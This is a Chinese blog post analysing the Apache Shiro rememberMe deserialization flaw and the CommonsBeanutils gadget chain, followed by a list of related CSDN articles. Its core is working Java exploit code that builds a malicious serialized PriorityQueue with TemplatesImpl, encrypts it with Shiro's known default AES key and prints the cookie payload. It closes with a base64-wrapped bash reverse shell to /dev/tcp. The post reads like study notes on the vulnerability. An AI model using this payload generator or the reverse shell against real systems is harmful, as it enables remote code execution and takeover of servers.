Apache shiro 反序列化及利用链

最新推荐文章于 2024-04-24 19:39:21 发布
最新推荐文章于 2024-04-24 19:39:21 发布
阅读量736 收藏 4
点赞数
分类专栏: java 文章标签: apache java 开发语言 运维 mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54850467/article/details/126636223
版权

convertBytestoPrincipals 解密 --> 反序列化

decrypt 解密 函数需要通过key 解密

密钥值是固定的

**触发反序列化流程:**读取cookie -> base64解码 -> AES解密 -> 反序列化

DNS可以出网,使用dnslog进行攻击

**结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是linux系统,则睡眠10s同理,可以考虑结合触发Java异常进判断,若系统返回对应的报错系统,或者返回通用的报错提示,说明当前的key和gadget组合是成功的:**结合CookieRememberMeManaer

shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能保存身份信息,使得无需再登录即可访问。

无赖调用链:

Commons-Beanutils 提供PropertyUtils getProperty 方法 使用者可以调用任意javabean对象里的getter方法。

public class Person {

private String name;
private int age;

public Person(String name, int age) {
    this.name = name;
    this.age = age;
}

public String getName() {
    return name;
}
public void setName(String name) {
    this.name = name;
}
public int getAge(){
    return age;
}
public void setAge(int age){
    this.age = age;
}

}

getter方法的利用链流程

PropertyUtils类的 getProperty()方法 --> 调用另一个反射对象的getProperty()方法 --> PropertyUtilsBean类的getProperty()方法 --> 又调用了一个getNestedProperty()方法 -->

getSimpleProperty 方法 --> getReadMethod实现

CC3链:

**TemplatesImpl类里调用getOutputProperties()**方法 这个方法调用了newTransformer(),他这个格式是符合JavaBean的格式,如果我们对一个TemplatesImpl对象调用这个getOutputProperties()方法,实际上也可以进行代码执行。这就找到了一个在CB下面的代码执行点,当o1是一个TemplatesImpl对 象,而property的值为outputProperties时,将会自动调用getter,也就是TemplatesImpl#getOutputProperties()方法,触发代码执行

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.PropertyUtils;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class BeanTest {
public static void main(String[] args) throws Exception{
Person person = new Person(“Le1a”,20);
//System.out.println(PropertyUtils.getProperty(person,“age”));
TemplatesImpl templates = new TemplatesImpl();
Class tc = templates.getClass();
Field nameFiled = tc.getDeclaredField(“_name”);
nameFiled.setAccessible(true);
nameFiled.set(templates,“aaaa”);
Field bytecodesField = tc.getDeclaredField(“_bytecodes”);
bytecodesField.setAccessible(true);

    Field tfactoryField = tc.getDeclaredField("\_tfactory");
    tfactoryField.setAccessible(true);
    tfactoryField.set(templates,new TransformerFactoryImpl());

    byte\[\] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
    byte\[\]\[\] codes = {code};
    bytecodesField.set(templates,codes);
    
    PropertyUtils.getProperty(templates,"outputProperties");
}

}

以上当****getProperty 的属性可控时就可以任意代码执行,通过找上层看谁调用****getProperty方法尝试控制属性值

利用链:

getProperty()的上层,找到了BeanComparator# compare() -> compare()调用了这个getProperty()****,这里是可控的 -> PriorityQueue#siftDownUsingComparator 调用了****getProperty() ->PriorityQueue#siftDown() 调用了siftDownUsingComparator() ->heapify()调用了 siftDown() ->最后PriorityQueue#readObject()又调用了heapify(),并且对queue数组进行循环反序列化

问题:

Shiro中,它的commons-beanutils虽然包含了一部分commons-collections的类,但却不全。这也导致,正常使用Shiro的时候不需要依赖于 commons-collections,但反序列化利用的时候需要依赖于commons-collections。

既然此时没有 ComparableComparator ,我们需要找到一个类来替换,它满足下面这几个条件:

实现 java.util.Comparator 接口

实现 java.io.Serializable 接口

Java、shiro或commons-beanutils自带,且兼容性强

找到一个CaseInsensitiveComparator,这个CaseInsensitiveComparator类java.lang.String类下的一个内部私有类,其实现了Comparator和Serializable,且位于Java的核心代码中.

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;

public class CBAttck {
public static void main(String[] args) throws Exception{
byte[] code = Files.readAllBytes(Paths.get(“D:\Cc\IntelliJ IDEA 2021.1\Code\out\production\Code\ClassLoader\Hacker.class”));
byte[][] codes = {code};//恶意类
//CC3
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, “_bytecodes”,codes);
setFieldValue(obj, “_name”, “aaaa”);
setFieldValue(obj, “_tfactory”, new TransformerFactoryImpl());
//CB
BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
final PriorityQueue queue = new PriorityQueue(2, comparator);
// stub data for replacement later
queue.add(“1”);
queue.add(“1”);
setFieldValue(comparator, “property”, “outputProperties”);
setFieldValue(queue, “queue”, new Object[]{obj, obj});

    ByteArrayOutputStream barr = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(barr);
    oos.writeObject(queue);
    oos.close();

    byte\[\] payload= barr.toByteArray();
    AesCipherService aes = new AesCipherService();
    byte \[\] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
    ByteSource finalpayload = aes.encrypt(payload,key);
    System.out.println(finalpayload.toString());
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
}

}

bash -c {echo,Base64编码}|{base64,-d}|{bash,-i}//Base64编码为bash -i >& /dev/tcp/IP/端口 0>&1 的base64编码

m0_54850467
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro序列之k1/2利用
weixin_45682070的博客
03-03 1925
前言 shiro的k1/k2链条其实之前我已经分析过了,但是呢,没以文章的形式发出来。可能有点懒惰了。上篇文章我们一起看了t3协议,t3序列的修复手段是在resolveClass方法添加检查,增加黑名单的形式。而shiro是重写了resolveClass方法导致很多利用链无法使用,但是shiro在编写的时候,并不是为了防御序列漏洞才去重写的resolveClass,但是就是这么一个无意间的举动,导致了防御住了大部分攻击。下面我们分析。 直接使用cc6 cc6的利用链我们前面有,拿来直接用,默认key
ShiroApache Shiro架构之实际运用(整合到Spring中)
热门推荐
武哥聊编程
07-06 2万+
写在前面:如题,这篇博文主要是总结一下如何将Shiro运用到实际项目中,本来准备将Shiro整到Spring中就行了,后来想想既然要整,就索性把SpringMVC和MyBatis也整进去吧,整个比较完整的,也能帮助更多的初学者。所以本文实际是将Shiro整到SSM中(基于maven)。 其实Shiro整合到Spring中并没有想象的那么困难,整到Spring中后,我们自定义的realm啊、se
Java Shiro序列CommonsCollections利用链分析
最新发布
qq_44192006的博客
04-24 545
本文主要分析CC1利用链,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java序列和php序列漏洞的区别(希望大家不要有惯性思维认为序列漏洞都一样,其实java序列和php序列的差别还是很大的并介绍了复现学习java序列漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用链的入口点)三个步骤,讲述利用链的构建。纸上得来终觉浅,绝知此事要躬行。
Java序列利用链挖掘之Shiro序列
HongYu012的博客
02-24 1157
在跟了一遍commons-collections系列的payload后,终于可以开始解决一下当时对shiro序列模凌两可的认识了。 当前,不管是国内实际的xx行动还是ctf比赛,shiro序列会经常看到。但在实际利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro-sample中的commons-collections:3.2.1(2021-03-16更新,这里经p牛指正,shiro并没有依赖cc库,详情)。 我们前面已经对commons-collections系列利用链...
Apache-shiro漏洞利用合集
weixin_51339377的博客
04-15 2384
这里漏洞原理不再多进行赘述 主要是测试漏洞的利用过程 漏洞1:shiro-550 CVE-2016-4437 shiro序列漏洞 利用版本 Apache-shiro <1.2.4 漏洞环境docker安装 docker pull medicean/vulapps:s_shiro_1 systemctl restart docker docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 启动成功以后直接访问本地的8081端口即可
Javaweb安全——序列漏洞-Shiro(CommonsBeanutils利用链)
weixin_43610673的博客
07-08 1614
先来看一段这个漏洞描述:这里使用的shiro应用demo为https://github.com/phith0n/JavaThings/tree/master/shirodemo测试的jdk版本为8u111 以及 8u211 都试过可以触发。的特征:处理cookie的流程:生成payload的流程:使用shiro内置的类 org.apache.shiro.crypto.AesCipherService进行AES加密,先要找到硬编码的key,然后写一个exp生成payload。key的位置位于(shiro...
Apache-Shiro序列1
08-03
Apache Shiro 序列漏洞...Apache Shiro序列漏洞是一个严重的安全漏洞,攻击者可以利用该漏洞在服务器上执行恶意命令。为了防止该漏洞,需要升级 Apache Shiro 到 1.2.5 及以上版本,并采取其他安全措施。
基于“Apache Shiro序列”漏洞谈网络安全问题防范.pdf
09-19
基于“Apache Shiro序列”漏洞谈网络安全问题防范.pdf
061-Apache Shiro 序列之殇.pdf
09-20
061-Apache Shiro 序列之殇.pdf
人工智能-项目实践-检测-Apache Shiro 序列漏洞检测与利用工具.zip
12-23
人工智能-项目实践-检测-Apache Shiro 序列漏洞检测与利用工具 Shiro_exploit Shiro_exploit用于检测与利用Apache Shiro序列漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,...
Shiro-EXP:Apache Shiro 序列漏洞检测与利用工具,一键注入内存马
05-26
Shiro exp使用手册Shiro rememberMe序列漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值先base64解码然后AES解密...
Shiro安全(三):Shiro自身利用链之CommonsBeanutils
weixin_43263451的博客
08-05 2161
前面在利用shiro序列时,都是利用CC链,但是这需要服务端引入CommonsCollections组件。所以最好是找到一条shiro自身的利用链,而不需要任何的前提条件在之前曾介绍过,在序列这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉 及到大小比较,进而执行 java.util.Comparator 接口的 compare() 方法。是否能够找到其他的Comparator呢本文主要是要理解如何在没有CC组件等外部依赖的情况下,找到shiro自身的利用链来提高攻击的成功率。...
shiro之过滤链
大鱼的博客
07-03 1498
当我们的shiro交给spring管理后,我们可以在web.xml中定义过滤,但是这样的过滤显得粗粒了,因为只是给了一个/*: <filter-mapping> <filter-name>shiroFilter</filter-name> <url-pattern>/*</url-pattern> </fi...
shiro拦截器链
java_zc的博客
03-21 749
http://blog.csdn.net/u013378306/article/details/50545552 shiro默认过滤器(10个)  anon -- org.apache.shiro.web.filter.authc.AnonymousFilterauthc -- org.apache.shiro.web.filter.authc.FormAuthenticati
Shiro源码学习(二)应用拦截器链
finalcola的博客
03-29 449
将配置的拦截器链加入到FilterChain中我们可能会在shiro中配置上图这样的拦截器链,但是像Tomcat这样的服务器中的Filter都是需要配置在web.xml中才会生效。而在上篇文章中,我们在web.xml中只配置了一个Filter,所以Shiro需要做的就是把配置的拦截器链“嫁接”到服务器原来的Filter链中。在上篇中,我们提到,最后发挥拦截功能的是SpringShiroFilter...
shiro无依赖利用链及exp编写
Thunderclap的博客
02-08 1183
因为shiro是存在commons-beanutils的依赖的,这样我们可以通过构造原生的CB1的链进行攻击shiro,但是我们通过ysoserial的CB1的链会发现其实并不会成功。原因是因为CB1的链里面其实是依赖于commons.collections包里面的部分内容的。如下发现是在我们构造BeanComparator的时候会调用,当没有显式传入Comparator 的情况下,则默认使用ComparableComparator。
[Java序列]—Shiro序列(二)
snowlyzz的博客
12-06 523
shiro RCE利用
记一次Shiro实战(目标不出网)
m0_49936858的博客
08-13 1094
获取Webshell 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取。直接在工具中选择获取webshell,然后填入想写入的路径+webshell的名字,比如https://xxxxx/fxqgl/static/flash/ini.jsp ,ini.jsp是我自己命名的。1.在工具的哪个地方上传木马。3. 找上传木马的地方。...
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )
good good study
03-28 9308
Shiro 1.2.4 序列漏洞
Apache shiro 序列工具
05-23
为了检测和利用 Apache Shiro 序列漏洞,可以使用一些序列工具,如 ysoserial、ShiroExploit 等。 其中,ysoserial 是一个常用的 Java 序列工具,可以生成各种常见的 Java 序列漏洞利用 payload,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值